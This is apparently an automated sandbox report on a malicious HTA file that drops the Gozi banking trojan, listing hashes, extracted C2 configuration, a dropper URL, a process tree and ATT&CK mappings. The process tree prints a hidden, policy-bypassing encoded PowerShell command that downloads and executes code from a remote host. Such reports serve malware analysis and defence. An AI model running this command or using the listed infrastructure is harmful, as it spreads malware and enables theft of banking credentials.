Analysis

  • max time kernel
    149s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    07-10-2023 01:35

General

  • Target

    4380de3cba18880ef72d2bc73ec84ee6f9f27b55d635a81ab8d40d488f59303d.hta

  • Size

    22KB

  • MD5

    57d3eb665f1e9e6a19f278baabd49e7b

  • SHA1

    44566a9d716e6abd0304544dd88d245fea990882

  • SHA256

    4380de3cba18880ef72d2bc73ec84ee6f9f27b55d635a81ab8d40d488f59303d

  • SHA512

    30a0a3349aa0b815728abdb0c770d65354cdcf68ca939de4c175bdb285e3d664d7afdddc4be91bae170a65e4f808e6de7cc877fa36442f64f7b7db993e83851d

  • SSDEEP

    384:rO6BO5aa8mOFhyS1q5H8qxAt4VFhmqmfW9PW6vN1v35Zh5LaBY5E6bqBdOfF:4zS0kPWVN5LbtcOfF

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://communicalink.com/index.php

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\4380de3cba18880ef72d2bc73ec84ee6f9f27b55d635a81ab8d40d488f59303d.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2440
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2596
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
        3⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1320
        • C:\Users\Admin\AppData\Local\Temp\VzfbnMZ.exe
          "C:\Users\Admin\AppData\Local\Temp\VzfbnMZ.exe"
          4⤵
          • Executes dropped EXE
          PID:2724

Network

MITRE ATT&CK Matrix ATT&CK v13

Defense Evasion

Modify Registry

1
T1112

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\VzfbnMZ.exe
    Filesize

    274KB

    MD5

    d18f3fecf6d28ddd0f4cf4a9b53c0aec

    SHA1

    05263b9ec69fcf48cc71443ba23545fabe21df12

    SHA256

    911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4

    SHA512

    4629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512

  • C:\Users\Admin\AppData\Local\Temp\VzfbnMZ.exe
    Filesize

    274KB

    MD5

    d18f3fecf6d28ddd0f4cf4a9b53c0aec

    SHA1

    05263b9ec69fcf48cc71443ba23545fabe21df12

    SHA256

    911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4

    SHA512

    4629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512

  • \Users\Admin\AppData\Local\Temp\VzfbnMZ.exe
    Filesize

    274KB

    MD5

    d18f3fecf6d28ddd0f4cf4a9b53c0aec

    SHA1

    05263b9ec69fcf48cc71443ba23545fabe21df12

    SHA256

    911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4

    SHA512

    4629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512

  • \Users\Admin\AppData\Local\Temp\VzfbnMZ.exe
    Filesize

    274KB

    MD5

    d18f3fecf6d28ddd0f4cf4a9b53c0aec

    SHA1

    05263b9ec69fcf48cc71443ba23545fabe21df12

    SHA256

    911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4

    SHA512

    4629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512

  • memory/1320-24-0x0000000071DD0000-0x000000007237B000-memory.dmp
    Filesize

    5.7MB

  • memory/1320-14-0x0000000002640000-0x0000000002680000-memory.dmp
    Filesize

    256KB

  • memory/1320-13-0x0000000002640000-0x0000000002680000-memory.dmp
    Filesize

    256KB

  • memory/1320-12-0x0000000071DD0000-0x000000007237B000-memory.dmp
    Filesize

    5.7MB

  • memory/1320-10-0x0000000071DD0000-0x000000007237B000-memory.dmp
    Filesize

    5.7MB

  • memory/2724-26-0x0000000002380000-0x0000000002480000-memory.dmp
    Filesize

    1024KB

  • memory/2724-27-0x0000000000220000-0x000000000022B000-memory.dmp
    Filesize

    44KB

  • memory/2724-28-0x0000000000400000-0x000000000228B000-memory.dmp
    Filesize

    30.5MB

  • memory/2724-29-0x0000000000290000-0x000000000029D000-memory.dmp
    Filesize

    52KB

  • memory/2724-32-0x0000000002380000-0x0000000002480000-memory.dmp
    Filesize

    1024KB

  • memory/2724-33-0x0000000000400000-0x000000000228B000-memory.dmp
    Filesize

    30.5MB

  • memory/2724-34-0x0000000000220000-0x000000000022B000-memory.dmp
    Filesize

    44KB